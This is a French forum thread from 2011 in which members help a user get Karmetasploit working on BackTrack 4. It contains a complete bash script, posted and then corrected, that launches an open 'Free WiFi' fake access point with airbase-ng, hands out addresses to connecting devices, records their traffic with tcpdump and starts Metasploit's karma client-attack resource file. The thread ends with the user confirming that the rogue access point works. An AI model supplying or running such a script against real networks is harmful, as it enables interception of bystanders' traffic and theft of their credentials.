Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 03-03-2011 18:33:05

jordx2504
Membre Actif
Inscription : 03-03-2011
Messages : 25

petit coup de pour sur l'utilisation de karmetasploit

Bonsoir a tous,
Cela fait un petit moment que je galère avec metasploit, je m'explique:
Je suis sous BT4 et j'utilise le script karmetasploit le fait est que je ne comprend pas trop l'utilité de la création de l'interface virtuel "mon0". Quelqu'un pourrait t'il m'éclairer ?

Le point d'accès et visible mais le dhcp ne fonctionne pas je pense a un mauvais paramétrage de /etc/network/interfaces
ou /etc/default/dhcp3-server je ne sait pas trop quelle interface a paramétrer pour le dhcp et la config ip (wlan0 ou mon0)

J'espère que quelqu'un pourra me débloquer...

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 03-03-2011 19:09:37

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : petit coup de pour sur l'utilisation de karmetasploit

Salut jordx2504, bienvenue sur le forum smile

Pour ta première question, mon0 est une interface virtuelle liée à ta carte WiFi, qui permet d'utiliser le mode monitor. Avant, c'est wlan0 qui était simplement passée en monitor mais maintenant une autre interface est créée pour pouvoir utiliser les 2 modes à la fois (wlan0 en mode managed, et mon0 en mode monitor). Note que dans le cas de karmetasploit, tu auras peut-être une interface at0, qui représente le point d'accès (c'est elle qu'il faudra configurer proprement au niveau de l'IP) smile

Pour le dhcp, qu'est-ce que tu as collé comme paramètres dhcp ? Tu as du créer un fichier dhcp.conf normalement, avec ces options. Tu as suivi quel tuto exactement, pour qu'on parle de la même base ?

Hors Ligne

#3 03-03-2011 19:31:38

jordx2504
Membre Actif
Inscription : 03-03-2011
Messages : 25

Re : petit coup de pour sur l'utilisation de karmetasploit

Salut antares145
Alors j'ai suivit se tuto:  tuto karmetasploit le soucis etant qu'il traite de backtrack 3

voici mon dhcpd:

ddns-update-style none;

authoritative;

log-facility local7;

subnet 192.168.1.0 netmask 255.255.255.0 {
  range 192.168.1.32 192.168.1.39;
  option domain-name-servers 192.168.1.1;
  option routers 192.168.1.1;
  option broadcast-address 192.168.1.255;
  default-lease-time 600;
  max-lease-time 7200;
}

et ici mes interfaces:

auto lo
iface lo inet loopback

auto eth0
iface eth0 inet dhcp

auto ath0
iface ath0 inet dhcp

auto wlan0
iface wlan0 inet static
address 192.168.1.1
netmask 255.255.255.0
gateway 192.168.1.1
network 192.168.1.0
broadcast 192.168.1.255

ainsie que le script adapté a backtrack 4:

#!/bin/bash

killall -9 dhcpd3 tcpdump airbase-ng

airmon-ng start wlan0
modprobe tun

airbase-ng -P -C 30 -c 10 -e "Free WiFi" -v wlan0 >/dev/null 2>&1 &
sleep 2
ifconfig mon0 up 192.168.1.1 netmask 255.255.255.0
sleep 2
echo > /var/lib/dhcp3/dhcpd.leases
dhcpd -cf /etc/dhcp3/dhcpd.conf mon0
sleep 2
ifconfig mon0 mtu 1800
tcpdump -ni mon0 -s 0 -w /pentest/wireless/karma-msf-scripts-0.01/evilap_eth.cap >/dev/null 2>&1 &
/pentest/exploits/framework3/msfconsole -r /pentest/exploits/framework3/karma.rc

PS: a chaque fois que je réexécute le script il recré une nouvelle interface virtuel: mon0, mon1, mon2, ... j'ai essayer un ifdown, sans resultat comment je peut les supprimer

pps:j'ai essayer le serveur dhcp en lan et il marche sad

Hors Ligne

#4 03-03-2011 19:51:30

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : petit coup de pour sur l'utilisation de karmetasploit

Plop, pour supprimer les moniteurs virtuels il te suffit de taper <airmon-ng stop mon0> ou bien sur 1, 2 etc etc ....

Pour les reste j'ai jamais été un pro de la table de routage alors je me prononce pas à ce sujet.


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#5 03-03-2011 21:21:22

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : petit coup de pour sur l'utilisation de karmetasploit

Mmmh, j'ai jamais vraiment creusé Karmetasploit sous BT4, donc je ne sais pas si on va savoir régler le problème...

Le DHCP a l'air bon. Enfin, dans le sens où il n'y a pas de problème majeur, mais de toute façon il t'aurait balancé une erreur si ça avait été le cas wink

Quelques corrections dans le script lui-même (les lignes commençant par # sont juste des commentaires, tu peux les virer)

#!/bin/bash

killall -9 dhcpd3 tcpdump airbase-ng

airmon-ng start wlan0
modprobe tun

## Ci-dessous tu dois utiliser mon0 et pas wlan0 comme interface
airbase-ng -P -C 30 -c 10 -e "Free WiFi" -v mon0 >/dev/null 2>&1 &

sleep 2
##Ci-dessous tu dois utiliser at0, c'est l'interface créée par airbase-ng
ifconfig at0 up 192.168.1.1 netmask 255.255.255.0
sleep 2
echo > /var/lib/dhcp3/dhcpd.leases
dhcpd -cf /etc/dhcp3/dhcpd.conf mon0
sleep 2
##Ci-dessous tu dois utiliser at0, c'est l'interface créée par airbase-ng
ifconfig at0 mtu 1800
##Ci-dessous tu dois utiliser at0, c'est l'interface créée par airbase-ng
tcpdump -ni at0 -s 0 -w /pentest/wireless/karma-msf-scripts-0.01/evilap_eth.cap >/dev/null 2>&1 &
/pentest/exploits/framework3/msfconsole -r /pentest/exploits/framework3/karma.rc

Avec ça, ton DHCP devrait fonctionner, mais je sais par expérience que c'est une vraie crasse donc je garantis rien... il  y aura peut-être de la redirection iptable à faire derrière, mais on verra ça après smile

@Noireaude : attends, on a même pas encore commencé à parler de routage big_smile Rhalala, ces experts qui veulent tout de suite aller aux aspects compliqués avant les questions simples... tongue

Hors Ligne

#6 03-03-2011 21:57:02

jordx2504
Membre Actif
Inscription : 03-03-2011
Messages : 25

Re : petit coup de pour sur l'utilisation de karmetasploit

Un truc uqui m'étonne, quand je lance: dhcpd3 -cf /etc/dhcp3/dhcpd.conf mon0

j'ai des retours du genre :

multiple interfaces match the same subnet: eth0 wlan0
multiple interfaces match the same shared: eth0 wlan0
multiple interfaces match the same subnet: eth0 mon0
multiple interfaces match the same shared: eth0 mon0
mon0: unknow hardware address type 803

Sa vous dit quelque chose ?
Ques que eth0 vient faire la ?

Hors Ligne

#7 03-03-2011 22:05:57

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : petit coup de pour sur l'utilisation de karmetasploit

Ca veut dire que eth0 est sur le même sous-réseau que wlan0, c-à-d qu'elle a une adresse du type 192.168.1.*. C'est tout à fait normal si tu es branché par câble à ton routeur, vu que cette plage IP est souvent celle utilisée par défaut sur les box et autres routeurs grand public smile

Par contre je persiste à penser que le DHCP doit tourner sur at0 et pas mon0. En tout cas il me semble que c'est comme ça qu'on avait fait la dernière fois qu'on s'est battus avec le DHCP d'un RogueAP --> Rogue AP : OK sauf internet !

Hors Ligne

#8 03-03-2011 22:39:16

jordx2504
Membre Actif
Inscription : 03-03-2011
Messages : 25

Re : petit coup de pour sur l'utilisation de karmetasploit

Sa fonctionne !!! a 22h37 le dhcp a attribuer sa premiere ip
et je m'incline devant antares145 (le dhcp doit bien tourner sous at0) ^^

On avance ...

Hors Ligne

#9 04-03-2011 00:18:40

noireaude
Membre d'honneur
Lieu : Chez le docteur
Inscription : 12-03-2010
Messages : 2 362
Site Web

Re : petit coup de pour sur l'utilisation de karmetasploit

antares145 a écrit :

@Noireaude : attends, on a même pas encore commencé à parler de routage big_smile Rhalala, ces experts qui veulent tout de suite aller aux aspects compliqués avant les questions simples... tongue

J'ai rien dit, je suis déjà dans mon pré en train d'endiguer une attaque de taupes.

Vais les noyer ces saloperies !!! lol


L’écureuil conserve les noisettes par instinct et non par représentation, sans cela il aurait déjà bâti des congélateurs à noisettes. Karl Marx : 1818 - 1883

Ma seule certitude est d'être dans le doute. Pierre Desproges : 1939 - 1988  @lavachelibre

Hors Ligne

#10 04-03-2011 12:01:16

jordx2504
Membre Actif
Inscription : 03-03-2011
Messages : 25

Re : petit coup de pour sur l'utilisation de karmetasploit

Bonjour,
même si le script marche, je commence a un peu m'embrouiller wlan0 est mon interface wifi, airmon me crée une interface virtuel mon0 qui me sert a crée l'AP et enssuite je crée encore une autre interface at0 pour le DHCP (ifconfig at0 up).
Ne peut t'on pas faire fonctionné le dhcp sur la même interface que l'AP ?

Hors Ligne

#11 04-03-2011 14:07:36

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 314

Re : petit coup de pour sur l'utilisation de karmetasploit

Salut wink

Quand tu créer un AP wlan0=mon0=at0 cette dernière étant l'interface servant de fake AP, si tu parle de créer un AP directement sur mon0 je ne pense pas que sa soit possible sans avoir de bugs hmm le principe meme de airbase est de créer une interface virtuel pour son AP soit at0 wink donc pourquoi changer de recette quand elle marche ? smile

En Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.035 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]